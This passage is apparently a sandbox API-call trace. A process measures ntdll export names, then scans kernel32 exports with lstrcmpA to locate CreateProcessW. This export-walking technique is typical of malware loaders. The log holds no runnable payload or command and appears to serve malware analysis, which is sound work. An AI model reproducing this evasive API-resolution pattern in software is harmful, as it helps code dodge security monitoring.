[0208.852] lstrlenA (lpString="LdrLockLoaderLock") returned 17 [0208.852] lstrlenA (lpString="LdrOpenImageFileOptionsKey") returned 26 [0208.852] lstrlenA (lpString="LdrProcessInitializationComplete") returned 32 [0208.852] lstrlenA (lpString="LdrProcessRelocationBlock") returned 25 [0208.852] lstrlenA (lpString="LdrProcessRelocationBlockEx") returned 27 [0208.852] lstrlenA (lpString="LdrQueryImageFileExecutionOptions") returned 33 [0208.852] lstrlenA (lpString="LdrQueryImageFileExecutionOptionsEx") returned 35 [0208.852] lstrlenA (lpString="LdrQueryImageFileKeyOption") returned 26 [0208.852] lstrlenA (lpString="LdrQueryModuleServiceTags") returned 25 [0208.852] lstrlenA (lpString="LdrQueryOptionalDelayLoadedAPI") returned 30 [0208.852] lstrlenA (lpString="LdrQueryProcessModuleInformation") returned 32 [0208.852] lstrlenA (lpString="LdrRegisterDllNotification") returned 26 [0208.852] lstrlenA (lpString="LdrRemoveDllDirectory") returned 21 [0208.852] lstrlenA (lpString="LdrRemoveLoadAsDataTable") returned 24 [0208.852] lstrlenA (lpString="LdrResFindResource") returned 18 [0208.852] lstrlenA (lpString="LdrResFindResourceDirectory") returned 27 [0208.852] lstrlenA (lpString="LdrResGetRCConfig") returned 17 [0208.852] lstrlenA (lpString="LdrResRelease") returned 13 [0208.852] lstrlenA (lpString="LdrResSearchResource") returned 20 [0208.852] lstrlenA (lpString="LdrResolveDelayLoadedAPI") returned 24 [0208.852] lstrlenA (lpString="LdrResolveDelayLoadsFromDll") returned 27 [0208.852] lstrlenA (lpString="LdrRscIsTypeExist") returned 17 [0208.852] lstrlenA (lpString="LdrSetAppCompatDllRedirectionCallback") returned 37 [0208.852] lstrlenA (lpString="LdrSetDefaultDllDirectories") returned 27 [0208.852] lstrlenA (lpString="LdrSetDllDirectory") returned 18 [0208.852] lstrlenA (lpString="LdrSetDllManifestProber") returned 23 [0208.852] lstrlenA (lpString="LdrSetImplicitPathOptions") returned 25 [0208.852] lstrlenA (lpString="LdrSetMUICacheType") returned 18 [0208.852] lstrlenA (lpString="LdrShutdownProcess") returned 18 [0208.852] lstrlenA (lpString="LdrShutdownThread") returned 17 [0208.852] lstrlenA (lpString="LdrStandardizeSystemPath") returned 24 [0208.852] lstrlenA (lpString="LdrSystemDllInitBlock") returned 21 [0208.852] lstrlenA (lpString="LdrUnloadAlternateResourceModule") returned 32 [0208.853] lstrlenA (lpString="LdrUnloadAlternateResourceModuleEx") returned 34 [0208.853] lstrlenA (lpString="LdrUnloadDll") returned 12 [0208.853] lstrlenA (lpString="LdrUnlockLoaderLock") returned 19 [0208.853] lstrlenA (lpString="LdrUnregisterDllNotification") returned 28 [0208.853] lstrlenA (lpString="LdrVerifyImageMatchesChecksum") returned 29 [0208.853] lstrlenA (lpString="LdrVerifyImageMatchesChecksumEx") returned 31 [0208.853] lstrlenA (lpString="LdrpResGetMappingSize") returned 21 [0208.853] lstrlenA (lpString="LdrpResGetResourceDirectory") returned 27 [0208.853] lstrlenA (lpString="MD4Final") returned 8 [0208.853] lstrlenA (lpString="MD4Init") returned 7 [0208.853] lstrlenA (lpString="MD4Update") returned 9 [0208.853] lstrlenA (lpString="MD5Final") returned 8 [0208.853] lstrlenA (lpString="MD5Init") returned 7 [0208.853] lstrlenA (lpString="MD5Update") returned 9 [0208.853] lstrlenA (lpString="NlsAnsiCodePage") returned 15 [0208.853] lstrlenA (lpString="NlsMbCodePageTag") returned 16 [0208.853] lstrlenA (lpString="NlsMbOemCodePageTag") returned 19 [0208.853] lstrlenA (lpString="NtAcceptConnectPort") returned 19 [0208.853] lstrlenA (lpString="NtAccessCheck") returned 13 [0208.853] lstrlenA (lpString="NtAccessCheckAndAuditAlarm") returned 26 [0208.853] lstrlenA (lpString="NtAccessCheckByType") returned 19 [0208.853] lstrlenA (lpString="NtAccessCheckByTypeAndAuditAlarm") returned 32 [0208.853] lstrlenA (lpString="NtAccessCheckByTypeResultList") returned 29 [0208.853] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarm") returned 42 [0208.853] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 50 [0208.853] lstrlenA (lpString="NtAddAtom") returned 9 [0208.853] lstrlenA (lpString="NtAddAtomEx") returned 11 [0208.853] lstrlenA (lpString="NtAddBootEntry") returned 14 [0208.853] lstrlenA (lpString="NtAddDriverEntry") returned 16 [0208.853] lstrlenA (lpString="NtAdjustGroupsToken") returned 19 [0208.853] lstrlenA (lpString="NtAdjustPrivilegesToken") returned 23 [0208.853] lstrlenA (lpString="NtAdjustTokenClaimsAndDeviceGroups") returned 34 [0208.853] lstrlenA (lpString="NtAlertResumeThread") returned 19 [0208.853] lstrlenA (lpString="NtAlertThread") returned 13 [0208.853] lstrlenA (lpString="NtAlertThreadByThreadId") returned 23 [0208.853] lstrlenA (lpString="NtAllocateLocallyUniqueId") returned 25 [0208.853] lstrlenA (lpString="NtAllocateReserveObject") returned 23 [0208.853] lstrlenA (lpString="NtAllocateUserPhysicalPages") returned 27 [0208.853] lstrlenA (lpString="NtAllocateUuids") returned 15 [0208.853] lstrlenA (lpString="NtAllocateVirtualMemory") returned 23 [0208.853] lstrlenA (lpString="NtAlpcAcceptConnectPort") returned 23 [0208.853] lstrlenA (lpString="NtAlpcCancelMessage") returned 19 [0208.853] lstrlenA (lpString="NtAlpcConnectPort") returned 17 [0208.853] lstrlenA (lpString="NtAlpcConnectPortEx") returned 19 [0208.854] lstrlenA (lpString="NtAlpcCreatePort") returned 16 [0208.854] lstrlenA (lpString="NtAlpcCreatePortSection") returned 23 [0208.854] lstrlenA (lpString="NtAlpcCreateResourceReserve") returned 27 [0208.854] lstrlenA (lpString="NtAlpcCreateSectionView") returned 23 [0208.854] lstrlenA (lpString="NtAlpcCreateSecurityContext") returned 27 [0208.854] lstrlenA (lpString="NtAlpcDeletePortSection") returned 23 [0208.854] lstrlenA (lpString="NtAlpcDeleteResourceReserve") returned 27 [0208.854] lstrlenA (lpString="NtAlpcDeleteSectionView") returned 23 [0208.854] lstrlenA (lpString="NtAlpcDeleteSecurityContext") returned 27 [0208.854] lstrlenA (lpString="NtAlpcDisconnectPort") returned 20 [0208.854] lstrlenA (lpString="NtAlpcImpersonateClientContainerOfPort") returned 38 [0208.854] lstrlenA (lpString="NtAlpcImpersonateClientOfPort") returned 29 [0208.854] lstrlenA (lpString="NtAlpcOpenSenderProcess") returned 23 [0208.854] lstrlenA (lpString="NtAlpcOpenSenderThread") returned 22 [0208.854] lstrlenA (lpString="NtAlpcQueryInformation") returned 22 [0208.854] lstrlenA (lpString="NtAlpcQueryInformationMessage") returned 29 [0208.854] lstrlenA (lpString="NtAlpcRevokeSecurityContext") returned 27 [0208.854] lstrlenA (lpString="NtAlpcSendWaitReceivePort") returned 25 [0208.854] lstrlenA (lpString="NtAlpcSetInformation") returned 20 [0208.854] lstrlenA (lpString="NtApphelpCacheControl") returned 21 [0208.854] lstrlenA (lpString="NtAreMappedFilesTheSame") returned 23 [0208.854] lstrlenA (lpString="NtAssignProcessToJobObject") returned 26 [0208.854] lstrlenA (lpString="NtAssociateWaitCompletionPacket") returned 31 [0208.854] lstrlenA (lpString="NtCallbackReturn") returned 16 [0208.854] lstrlenA (lpString="NtCancelIoFile") returned 14 [0208.854] lstrlenA (lpString="NtCancelIoFileEx") returned 16 [0208.854] lstrlenA (lpString="NtCancelSynchronousIoFile") returned 25 [0208.854] lstrlenA (lpString="NtCancelTimer") returned 13 [0208.854] lstrlenA (lpString="NtCancelTimer2") returned 14 [0208.854] lstrlenA (lpString="NtCancelWaitCompletionPacket") returned 28 [0208.854] lstrlenA (lpString="NtClearEvent") returned 12 [0208.854] lstrlenA (lpString="NtClose") returned 7 [0208.854] lstrlenA (lpString="NtCloseObjectAuditAlarm") returned 23 [0208.854] lstrlenA (lpString="NtCommitComplete") returned 16 [0208.854] lstrlenA (lpString="NtCommitEnlistment") returned 18 [0208.854] lstrlenA (lpString="NtCommitTransaction") returned 19 [0208.854] lstrlenA (lpString="NtCompactKeys") returned 13 [0208.854] lstrlenA (lpString="NtCompareObjects") returned 16 [0208.854] lstrlenA (lpString="NtCompareTokens") returned 15 [0208.854] lstrlenA (lpString="NtCompleteConnectPort") returned 21 [0208.855] lstrlenA (lpString="NtCompressKey") returned 13 [0208.855] lstrlenA (lpString="NtConnectPort") returned 13 [0208.860] GetModuleHandleA (lpModuleName="ADVAPI32.DLL") returned 0x7ff976f80000 [0208.860] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0208.860] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessW") returned -1 [0208.860] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessW") returned -1 [0208.861] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="Beep", lpString2="CreateProcessW") returned -1 [0208.862] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessW") returned -1 [0208.863] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessW") returned -1 [0208.864] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessW") returned -1 [0208.865] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessW") returned -1 [0208.866] lstrcmpA (lpString1="CreateProcessAsUserW", 